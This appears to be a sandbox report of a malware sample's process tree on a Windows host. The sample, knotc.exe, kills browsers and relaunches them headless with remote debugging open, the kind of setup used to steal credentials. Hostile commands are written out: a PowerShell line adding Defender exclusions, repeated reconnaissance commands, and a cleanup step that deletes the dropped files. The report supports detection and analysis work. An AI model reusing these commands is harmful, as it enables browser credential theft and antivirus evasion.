C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffbc2fc3cb8,0x7ffbc2fc3cc8,0x7ffbc2fc3cd89⤵PID:5864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1884 /prefetch:29⤵PID:6912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 /prefetch:39⤵PID:6884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:89⤵PID:2752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:19⤵
- Uses browser remote debugging
PID:2780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:19⤵
- Uses browser remote debugging
PID:7148
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1900 /prefetch:29⤵PID:4804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2352 /prefetch:29⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2304 /prefetch:29⤵PID:1744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2344 /prefetch:29⤵PID:7124
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2388 /prefetch:29⤵PID:5852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:19⤵
- Uses browser remote debugging
PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:19⤵
- Uses browser remote debugging
PID:2996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1888,1560369621924746140,2082842183058168017,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3376 /prefetch:89⤵PID:6652
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\397506\Mesa.com" & rd /s /q "C:\ProgramData\KFBAECBAEGDG" & exit8⤵PID:976
-
C:\Windows\SysWOW64\timeout.exetimeout /t 109⤵
- Delays execution with timeout.exe
PID:5260
-
-
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 57⤵PID:7044
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1009551001\knotc.exe"C:\Users\Admin\AppData\Local\Temp\1009551001\knotc.exe"5⤵
- Executes dropped EXE
PID:4972 -
C:\Users\Admin\AppData\Local\Temp\1009551001\knotc.exe"C:\Users\Admin\AppData\Local\Temp\1009551001\knotc.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:792 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"7⤵PID:5004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls7⤵PID:6696
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"7⤵PID:6760
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:6892
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"7⤵PID:6772
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe8⤵
- Suspicious use of AdjustPrivilegeToken
PID:6900
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"7⤵PID:6788
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe8⤵
- Suspicious use of AdjustPrivilegeToken
PID:6912
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --restore-last-session --remote-debugging-port=8048 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"7⤵
- Uses browser remote debugging
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4832 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffba19bcc40,0x7ffba19bcc4c,0x7ffba19bcc588⤵PID:3004
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless=new --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2336,i,11318621895747720091,7855124165572929479,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2332 /prefetch:28⤵PID:4380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1820,i,11318621895747720091,7855124165572929479,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2364 /prefetch:38⤵PID:6216
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=1896,i,11318621895747720091,7855124165572929479,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2552 /prefetch:88⤵PID:1564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8048 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3636,i,11318621895747720091,7855124165572929479,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3672 /prefetch:18⤵
- Uses browser remote debugging
PID:6192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8048 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3644,i,11318621895747720091,7855124165572929479,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3708 /prefetch:18⤵
- Uses browser remote debugging
PID:6196
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --remote-debugging-port=8048 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4392,i,11318621895747720091,7855124165572929479,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:18⤵
- Uses browser remote debugging
PID:5092
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --no-appcompat-clear --field-trial-handle=4624,i,11318621895747720091,7855124165572929479,262144 --disable-features=PaintHolding --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4188 /prefetch:88⤵PID:844
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --restore-last-session --remote-debugging-port=8751 --remote-allow-origins=* --headless=new "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"7⤵
- Uses browser remote debugging
PID:4724 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffba1673cb8,0x7ffba1673cc8,0x7ffba1673cd88⤵PID:3104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1408,1970856823870535807,8506871436699874038,131072 --headless=new --headless --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --override-use-software-gl-for-tests --mojo-platform-channel-handle=1468 /prefetch:28⤵PID:6076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1408,1970856823870535807,8506871436699874038,131072 --lang=en-US --service-sandbox-type=none --use-gl=swiftshader-webgl --headless --mojo-platform-channel-handle=1812 /prefetch:38⤵
- Suspicious behavior: EnumeratesProcesses
PID:6188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=8751 --allow-pre-commit-input --field-trial-handle=1408,1970856823870535807,8506871436699874038,131072 --lang=en-US --headless --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1960 /prefetch:18⤵
- Uses browser remote debugging
PID:5684
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --restore-last-session --remote-debugging-port=8928 --remote-allow-origins=* --headless=new --user-data-dir=C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles7⤵
- Uses browser remote debugging
PID:1920 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --restore-last-session --remote-debugging-port=8928 --remote-allow-origins=* --headless=new --user-data-dir=C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles8⤵
- Uses browser remote debugging
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1156 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1936 -parentBuildID 20240401114208 -prefsHandle 1868 -prefMapHandle 1860 -prefsLen 23678 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {62ca91a6-c988-41e8-b0ad-571f6284431f} 1156 "\\.\pipe\gecko-crash-server-pipe.1156" gpu9⤵PID:5024
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2416 -parentBuildID 20240401114208 -prefsHandle 2408 -prefMapHandle 2396 -prefsLen 24598 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2d692347-460c-45bb-81f6-3af0e62e8b5b} 1156 "\\.\pipe\gecko-crash-server-pipe.1156" socket9⤵PID:6208
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3400 -childID 1 -isForBrowser -prefsHandle 3392 -prefMapHandle 3388 -prefsLen 28292 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {299e485f-3b87-481c-b839-32f370a03f6d} 1156 "\\.\pipe\gecko-crash-server-pipe.1156" tab9⤵PID:5944
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3264 -childID 2 -isForBrowser -prefsHandle 3272 -prefMapHandle 3268 -prefsLen 34807 -prefMapSize 244658 -jsInitHandle 932 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {25d28818-19dd-4274-b888-f4802ef0a5a0} 1156 "\\.\pipe\gecko-crash-server-pipe.1156" tab9⤵PID:5768
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4144 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4128 -prefMapHandle 4288 -prefsLen 34807 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eab705f4-7f73-41bf-af3a-ad3f8b0cf3ad} 1156 "\\.\pipe\gecko-crash-server-pipe.1156" utility9⤵
- Checks processor information in registry
PID:6284
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1868 -parentBuildID 20240401114208 -prefsHandle 2164 -prefMapHandle 3548 -prefsLen 34807 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c32a535-915c-42d1-8e6e-ef5fa9c03840} 1156 "\\.\pipe\gecko-crash-server-pipe.1156" gpu9⤵PID:6080
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM msedge.exe"7⤵PID:6384
-
C:\Windows\system32\taskkill.exetaskkill /F /IM msedge.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"7⤵PID:4708
-
C:\Windows\system32\taskkill.exetaskkill /F /IM chrome.exe8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1272
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"7⤵PID:1148
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe8⤵
- Suspicious use of AdjustPrivilegeToken
PID:1452
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --restore-last-session --remote-debugging-port=8412 --remote-allow-origins=* --headless=new --user-data-dir=C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles7⤵
- Uses browser remote debugging
PID:5904 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --restore-last-session --remote-debugging-port=8412 --remote-allow-origins=* --headless=new --user-data-dir=C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles8⤵
- Uses browser remote debugging
- Checks processor information in registry
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:5992 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1904 -parentBuildID 20240401114208 -prefsHandle 1820 -prefMapHandle 1812 -prefsLen 23678 -prefMapSize 244710 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ce07e2a-1f81-4120-b59b-801d5cc574dc} 5992 "\\.\pipe\gecko-crash-server-pipe.5992" gpu9⤵PID:5636
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2252 -prefsLen 24598 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b16b70b7-a9b4-4a47-9c4a-7e5160f70d57} 5992 "\\.\pipe\gecko-crash-server-pipe.5992" socket9⤵PID:692
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3348 -childID 1 -isForBrowser -prefsHandle 3340 -prefMapHandle 3336 -prefsLen 28292 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c1a60a1d-eb9e-4a4e-8b08-72dd04883d5c} 5992 "\\.\pipe\gecko-crash-server-pipe.5992" tab9⤵PID:248
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3312 -childID 2 -isForBrowser -prefsHandle 3032 -prefMapHandle 3024 -prefsLen 28333 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0dd4e25d-52d9-467f-9d5b-645b9fc01e28} 5992 "\\.\pipe\gecko-crash-server-pipe.5992" tab9⤵PID:5868
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4296 -childID 3 -isForBrowser -prefsHandle 4288 -prefMapHandle 4284 -prefsLen 34807 -prefMapSize 244710 -jsInitHandle 924 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4167fd8f-f8cd-4fcd-8c63-72d37caab16b} 5992 "\\.\pipe\gecko-crash-server-pipe.5992" tab9⤵PID:5348
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4952 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4944 -prefMapHandle 4940 -prefsLen 34807 -prefMapSize 244710 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {700ea06e-9df2-4f1d-8bf1-e92ad2e569af} 5992 "\\.\pipe\gecko-crash-server-pipe.5992" utility9⤵
- Checks processor information in registry
PID:6928
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "taskkill /F /IM firefox.exe"7⤵PID:2028
-
C:\Windows\system32\taskkill.exetaskkill /F /IM firefox.exe8⤵
- Kills process with taskkill
PID:6656
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command " Add-MpPreference -ExclusionExtension '.ps1', '.tmp', '.py' Add-MpPreference -ExclusionPath \"$env:TEMP\", \"$env:APPDATA\" "7⤵
- Command and Scripting Interpreter: PowerShell
PID:5296
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:7036
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:7148
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig"7⤵PID:5684
-
C:\Windows\system32\ipconfig.exeipconfig8⤵
- Gathers network information
PID:6232
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig /all"7⤵PID:7136
-
C:\Windows\system32\ipconfig.exeipconfig /all8⤵
- Gathers network information
PID:6276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:2780
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"7⤵PID:2020
-
C:\Windows\system32\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
PID:5604
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig /all"7⤵PID:6848
-
C:\Windows\system32\ipconfig.exeipconfig /all8⤵
- Gathers network information
PID:5012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:4656
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:5416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig"7⤵PID:3168
-
C:\Windows\system32\ipconfig.exeipconfig8⤵
- Gathers network information
PID:4304
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ipconfig /all"7⤵PID:496
-
C:\Windows\system32\ipconfig.exeipconfig /all8⤵
- Gathers network information
PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"7⤵PID:3672
-
C:\Windows\system32\systeminfo.exesysteminfo8⤵
- Gathers system information
PID:4884
-
-
-
